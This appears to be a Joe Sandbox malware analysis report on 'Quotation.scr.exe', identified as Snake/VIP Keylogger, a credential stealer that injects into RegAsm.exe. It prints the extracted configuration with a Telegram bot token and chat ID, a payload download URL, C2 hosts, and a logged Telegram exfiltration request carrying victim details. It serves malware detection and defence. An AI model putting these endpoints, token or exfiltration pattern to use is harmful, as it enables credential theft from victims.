Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.scr.exe

Overview

General Information

Sample name:Quotation.scr.exe
Analysis ID:1507754
MD5:e0a5ee16dd5018801a0afadb2559b555
SHA1:26443711531805d3e268212b552632558e90a015
SHA256:6b89ca3745f66447d9dab6fc2bd79820dd3ee4ce5edc40c25d1c7bf2c9250352
Tags:exe
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Quotation.scr.exe (PID: 3108 cmdline: "C:\Users\user\Desktop\Quotation.scr.exe" MD5: E0A5EE16DD5018801A0AFADB2559B555)
    • RegAsm.exe (PID: 2432 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Bot Token": "7291671710:AAGCLF2_8yzxPxb9Vlxy9pUy6yBLGLfnO5g", "Chat id": "2052461776", "Version": "4.4"}
{"Exfil Mode": "Telegram", "Token": "7291671710:AAGCLF2_8yzxPxb9Vlxy9pUy6yBLGLfnO5g", "Chat_id": "2052461776", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2254071383.0000000005790000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d604:$a1: get_encryptedPassword
          • 0x2d921:$a2: get_encryptedUsername
          • 0x2d414:$a3: get_timePasswordChanged
          • 0x2d51d:$a4: get_passwordField
          • 0x2d61a:$a5: set_encryptedPassword
          • 0x2ecf8:$a7: get_logins
          • 0x2ec5b:$a10: KeyLoggerEventArgs
          • 0x2e8c0:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 21 entries
          SourceRuleDescriptionAuthorStrings
          0.2.Quotation.scr.exe.5790000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            2.2.RegAsm.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              2.2.RegAsm.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                2.2.RegAsm.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  2.2.RegAsm.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    Click to see the 23 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-09T08:55:17.814271+020028033053Unknown Traffic192.168.2.649719188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-09T08:55:16.251452+020028032742Potentially Bad Traffic192.168.2.649713132.226.8.16980TCP
                    2024-09-09T08:55:17.251451+020028032742Potentially Bad Traffic192.168.2.649713132.226.8.16980TCP
                    2024-09-09T08:55:18.642109+020028032742Potentially Bad Traffic192.168.2.649720132.226.8.16980TCP
                    2024-09-09T08:55:21.173447+020028032742Potentially Bad Traffic192.168.2.649723132.226.8.16980TCP
                    2024-09-09T08:55:23.548357+020028032742Potentially Bad Traffic192.168.2.649725132.226.8.16980TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: Quotation.scr.exeAvira: detected
                    Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                    Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                    Source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7291671710:AAGCLF2_8yzxPxb9Vlxy9pUy6yBLGLfnO5g", "Chat_id": "2052461776", "Version": "4.4"}
                    Source: 2.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7291671710:AAGCLF2_8yzxPxb9Vlxy9pUy6yBLGLfnO5g", "Chat id": "2052461776", "Version": "4.4"}
                    Source: Quotation.scr.exeVirustotal: Detection: 28%Perma Link
                    Source: Quotation.scr.exeReversingLabs: Detection: 31%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: Quotation.scr.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Quotation.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49718 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 135.181.160.46:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49734 version: TLS 1.2
                    Source: Quotation.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 0586B850h0_2_0586B790
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 0586B850h0_2_0586B798
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 05865041h0_2_05864FD0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 05865041h0_2_05864FE0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 05865041h0_2_058651D0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 0586490Ch0_2_05864899
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 0586490Ch0_2_058648A8
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 058D4C3Ch0_2_058D4BB0
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 058D1773h0_2_058D1546
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 058D1773h0_2_058D144B
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then jmp 058D1773h0_2_058D1458
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_058D0006
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_058D0040
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_0593D578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 012DF5C5h2_2_012DF428
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 012DF5C5h2_2_012DF614
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 012DFD81h2_2_012DFAC8

                    Networking

                    barindex
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /Mytiypg.vdf HTTP/1.1Host: eg-mart.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20and%20Time:%2010/09/2024%20/%2003:15:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20618321%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49725 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49720 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49723 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49713 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49719 -> 188.114.96.3:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49718 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /Mytiypg.vdf HTTP/1.1Host: eg-mart.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20and%20Time:%2010/09/2024%20/%2003:15:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20618321%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: eg-mart.com
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 09 Sep 2024 06:55:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20a
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002E9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: RegAsm.exe, 00000002.00000002.4576678268.000000000401E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4576678268.0000000003D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.00000000023E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eg-mart.com
                    Source: Quotation.scr.exeString found in binary or memory: https://eg-mart.com/Mytiypg.vdf
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002D5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: RegAsm.exe, 00000002.00000002.4574409470.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4574409470.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
